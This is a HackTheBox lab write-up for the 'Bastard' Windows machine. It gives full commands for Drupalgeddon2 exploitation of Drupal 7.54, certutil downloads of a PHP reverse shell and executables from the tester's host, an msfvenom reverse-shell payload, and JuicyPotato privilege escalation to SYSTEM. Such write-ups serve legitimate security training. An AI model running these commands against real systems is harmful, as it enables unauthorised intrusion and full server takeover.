HackTheBox Writeup – Bastard (Windows) – Medium Difficulty
Introduction
I ran out of fun medium difficulty HTB boxes, so I decided to try a retired machine. This one was a lot easier – but it’s always fun to run through a box where you’ve already seen all the challenges before.
Enumeration / Initial Foothold
I start with RustScan, FeroxBuster and AutoRecon. These are generally my chosen 3 tools at the start of any CTF.
rustscan 10.10.10.9 --range 1-65535 -- -A -sC -sV | tee nmap.txt
sudo $(which autorecon) 10.10.10.9 -v --exclude-tags="dirbuster,nikto,smbmap" -p 80,135,49154
feroxbuster -u http://10.10.10.9 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --quiet -o ferox.txt
I navigate to the machine in Firefox.
We can try to make an account – but the email feature requires email. I think you might be able to do this with an email using the AD domain, but that’s not what I’m going for right now.
Anyways, Feroxbuster shows us the install.php page, and we now know it’s Drupal.
Feroxbuster also shows us the changelog, and we can see the version – 7.54.
After a little googling, I come across this Github exploit: https://github.com/dreadlocked/Drupalgeddon2.
We can run it with the following commands to exploit the web server:
- sudo gem install highline
- ruby drupalgeddon2.rb http://10.10.10.9/ –authentication
- username: admin
- password: admin
- form field: username
- form field 2: password
- login path: user/login
- suffix: &form_id
It says we are nt authority – but not SYSTEM. We are just a user.
After a little trial and error / recon, we can find that we have write access to the web server’s directory. This is good, because this shell has limited functionality and most commands won’t work. First, grab the PHP Ivan Sincek shell from RevShells.com:
Write that to your working directory, and spin up a python server – python3 -m http.server 80
– then download it, by using certutil in your limited shell: certutil.exe -urlcache -f http://10.10.16.9/reverse.php C:\inetpub\drupal-7.54\reverse.php
Then spin up a netcat listener on port 4444 and visit /reverse.php on the target machine.
Privilege Escalation
We can check our privileges as the new user we’ve compromised.
It’s not a big surprise to find we have SeImpersonatePrivilege, which usually means we’ve already succeeded.
Exploitation is relatively simple here – we can use a msfvenom shell and run JuicyPotato to abuse privileges and run it as SYSTEM. All we need to do is generate the binary, send it through the drupalgeddon shell, and execute it with JuicyPotato – after spinning up a netcat listener. Here’s the commands you can use:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.9 LPORT=443 -a x64 --platform Windows -f exe -o shell.exe
certutil.exe -urlcache -f http://10.10.16.9/shell.exe C:\inetpub\drupal-7.54\shell.exe
certutil.exe -urlcache -f http://10.10.16.9/JuicyPotato.exe C:\inetpub\drupal-7.54\JuicyPotato.exe
nc -lvnp 443
.\JuicyPotato.exe -l 1337 -p C:\inetpub\drupal-7.54\shell.exe -t *
And just like that, we have full administrative privileges.
Lessons Learned
- As always – check for public exploits first.
- If you can’t get your shell to work the way you want it to, use it to find another way to get another one.
- Not much else – this box was a lot easier than most of the other boxes.
Song Of The Day – History by Eric Prydz